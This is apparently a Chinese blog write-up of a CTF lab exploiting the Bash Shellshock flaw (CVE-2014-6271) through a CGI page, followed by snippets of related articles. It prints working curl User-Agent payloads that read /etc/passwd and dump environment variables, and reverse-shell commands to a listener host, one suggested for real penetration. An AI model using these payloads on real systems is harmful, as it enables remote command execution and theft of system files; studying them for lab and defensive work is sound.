[Bash]Shellshock

最新推荐文章于 2023-01-03 14:26:21 发布
最新推荐文章于 2023-01-03 14:26:21 发布
阅读量309 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43801002/article/details/105786058
版权

#讲在前面
对于shellshock漏洞,还是必须要补充一些点的
网上对于这个漏洞的复现教程所剩无几,可能是因为破坏力实在太大,且易于实施。
2014 年 9 月 24 日,Bash 惊爆严重安全漏洞,编号为 CVE-2014-6271,该漏洞将导致远程攻击者在受影响的系统上执行任意代码。GNU Bash 是一个为 GNU 计划编写的 Unix Shell,广泛使用在 Linux 系统内,最初的功能仅是一个简单的基于终端的命令解释器。这意味全球至少 150 万的主机将受到影响,此外 Linux/Unix 世界内的安卓和苹果都难幸免。
#题目
image.png
#在vulhub上有该题的补充说明,知道有一个victim.cgi网页
image.png
使用curl -A 或者 -H 参数模拟Http头命令,并调用“cat /etc/passwd”读passwd文件,发送到存在Bash漏洞的docker容器,成功读取到了passwd文件内容。

curl -A "() { echo ShellShock; }; echo; /bin/cat /etc/passwd" http://node3.buuoj.cn:28253/victim.cgi

image.png
成功回显
如果是用bp来测试的话
修改http协议中的User-Agent字段为:
#() { :; };echo;/bin/cat /etc/passwd
效果是一样的,在此就不上图了
*对于实际渗透过程中,我们可以直接放反弹shell

curl -A "() { :; };echo;/bin/bash -i >& /dev/tcp/监听机IP/1234 0>&1" http://node3.buuoj.cn:28253/victim.cgi

然后起一个nc就欧克
nc -lvvp 1234

#对于这道题来说,启动不了反弹shell,没反应,可能是权限问题,那我们直接查看env就可以

curl -A "() { echo ShellShock; }; echo;/usr/bin/env" http://node3.buuoj.cn:28253/victim.cgi                                                                                                                         
HTTP_HOST=node3.buuoj.cn:28253

image.png
#!!!没有flag,直接cat /flag也一样,就是没有!一血就这么没了
image.png
疯狂吐槽赵总
image.png

浩歌已行
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulhub-Shellshock Remote Command Injection (CVE-2014-6271)
ad12456的博客
05-18 454
Shellshock远程命令注入
Bash(shellshock)
chocomoss的博客
11-30 236
影响 漏洞影响:GNU Bash <= 4.3 启动服务器 搭建:docker-compose up -d 查看:docker-compose ps 抵达网站 抓包拦截 User-Agent: () { :;};echo ; echo; echo $(/bin/ls /); 反弹shell:User-Agent:() { :; }; /bin/bash -i >& /dev/tcp/192.168.118.1/4444 0>&1; ...
vulhub漏洞复现之bashShellshock CVE-2014-6271)
weixin_43071873的博客
11-27 1248
Shellshock 破壳漏洞 CVE-2014-6271 1.漏洞概述: GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行。 2.漏洞影响:GNU Bash <= 4.3
bash(CVE-2014-6271) shellshock-破壳漏洞复现
weixin_45095113的博客
01-03 517
bash(CVE-2014-6271) shellshock-破壳漏洞复现
Bash Shellshock(Bash远程代码执行)漏洞分析及利用思路
热门推荐
Exploit的小站~
05-10 3万+
 今日爆出一个Bash的RCE漏洞,威力巨大。看了看老外的分析,觉得有必要写一写自己对这个漏洞的理解。 首先,问题起因于一个命令ENV。 原型: env [OPTION]... [NAME=VALUE]... [COMMAND [ARGS]...] Man是这么说的: Display, set, or remove environment variables,Run a comm...
shellshock 漏洞 bash漏洞rpm包升级包
09-28
研究人员周四发布警告称 黑客已经开始利用最新的“Shellshock”电脑漏洞 借助蠕虫病毒扫描有漏洞的系统 然后感染这些 redhat 6 5以上版本32 位64位 升级包
Bash漏洞-Shellshock浅析.pdf
07-10
Bash漏洞与ShellshockBash漏洞,又称为Shellshock,是指在2014年发现的一种严重安全漏洞,影响了广泛使用的Bash shell程序。Bash是Unix-like操作系统,包括Linux和Mac OS X的默认命令行解释器。这个漏洞的存在...
Bash漏洞——Shellshock浅析.pdf
07-10
Bash漏洞——Shellshock浅析】 Bash漏洞,又称Shellshock,是指在2014年被发现的一个严重安全漏洞,它影响了广泛使用的Bash shell,这是一个在Unix-like操作系统,包括Linux和Mac OS X中的命令行解释器。这个漏洞...
shellshock:Bash中的太空射击游戏
05-24
标题 "shellshock:Bash中的太空射击游戏" 提到的是一个使用Bash shell语言开发的太空射击游戏。在本文中,我们将深入探讨这个独特的概念,了解如何在命令行环境中创建游戏,以及它如何利用Bash的功能来实现这一目标...
shellshock补丁
10-20
破壳漏洞(shellshock)红帽4 X86(32位)补丁 内含: bash-3.0-27.0.3.el4.i386.rpm bash-debuginfo-3.0-27.el4.4.i386.rpm ------------------------------------------- 验证命令: env x='() { :;}; echo vulnerable'...
Bash ShellShock 解决办法
a1895024的博客
10-13 449
2014 年 9 月 24 日,Bash 惊爆严重安全漏洞,编号为 CVE-2014-6271,该漏洞将导致远程攻击者在受影响的系统上执行任意代码。GNU Bash 是一个为 GNU 计划编写的 Unix Shell,广泛使用在 Linux 系统内,最初的功能仅是一个简单的基于终端的命令解释器。这意味全球至少 150 万的主机将受到影响,此外 Linux/Unix 世界内的安...
bash漏洞(shellshock)详细描述及解决方案
weixin_33860528的博客
09-30 273
RedHat有关bash代码注入漏洞(又叫Shellshock漏洞)的详细描述及解决方案如下:https://access.redhat.com/articles/1200223 转载于:https://blog.51cto.com/dangzhiqiang/1559652...
Shellshock Lab
Yuhan2001的CSDN博客
12-05 4082
软件安全课程实验二shellshock; 版本:SeedUbuntu20.04; 课本:计算机安全导论:深度实践;
Linux超级Bash漏洞(Shellshock)修复方法,内附Debian服务器详细方法
tiankongxiaya的专栏
09-29 845
近日,Linux社区爆出了关于Linux Bash的安全漏洞,该漏洞源于你调用的bash shell之前创建的特殊的环境变量,这些变量可以包含代码,同时会被bash执行。 不同于之前的SSL的HeartBlood漏洞,这个Bash漏洞能让黑客通过嵌入恶意命令完全控制目标机器,而不像HeartBlood只是可以嗅探敏感信息。 对于所有安装GNU bash 版本小于或者等于4.3的Linux操作系统
ShellShock 攻击实验
qq_29687403的博客
07-21 1152
ShellShock 攻击实验 实验简介 2014年9月24日,Bash中发现了一个严重漏洞shellshock,该漏洞可用于许多系统,并且既可以远程也可以在本地触发。在本实验中,我们需要亲手重现攻击来理解该漏洞,并回答一些问题。 准备工作 Shellshock Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年
ShellShock(破壳漏洞)的简单分析
爱唠叨的老鱼
09-27 1万+
(1)什么是ShellShock? (2)ShellShock漏洞的原理。 (3)ShellShock漏洞的危害。 (4)如何修复ShellShock漏洞。
[BUUCTF-pwn] [HarekazeCTF2019]Ramen
weixin_52640415的博客
01-12 1029
看exp再慢慢消化。逻辑错造成的指针溢出。 这个题虽然有UAF但是利用起来很困难,本来不想看那么长的程序,没办法看程序再看了exp后才明白。 程序分主程序和order,serv,change 三个函数,主程序没啥内容,但是循环队列的指针v4放在这了。v4依次表示队列块指针,头id,尾id和总长度。 void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { int v3; // eax char v4[24]; //
BUUCTF pwn 四月刷题
coco的博客
04-07 804
BUUCTF四月刷题 [OGeek2019]bookmanager 这道题程序看似比较复杂,实际上好好分析程序的结构和逻辑之后,还是一个堆溢出,在updata函数中更新text时候可以更新0xFF长度的内容,造成溢出。这类题比较重要的是一定要弄清楚程序中的各种结构再下手。 libc泄漏的手段还是通过small bin free进unsorted bin之后打印出main_arena附近的地址;ge...
shellshock-Attack-Lab
qq_49005782的博客
11-07 4017
shellshock Attack Lab 实验概述 实验背景 2014 年 9 月 24 日,发现了 Bash 中的一个严重漏洞 Shellshock,这个漏洞可以用于许多系统,可以远程启动,也可以从本地机器启动。在这个实验中,学生们需要研究这种攻击,这样才能了解Shellshock 的脆弱性. 此次实验包括以下四个内容: Shellshock Environment variables Function definition in bash Apache and CGI programs 实验
shellshock漏洞利用
最新发布
04-03
Shellshock漏洞是一个存在于Bash(Unix和Linux操作系统的一种常用Shell)中的安全漏洞,它于2014年被公开。该漏洞允许攻击者通过构造恶意的环境变量来执行任意的命令,从而导致系统被入侵。 Shellshock漏洞的利用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值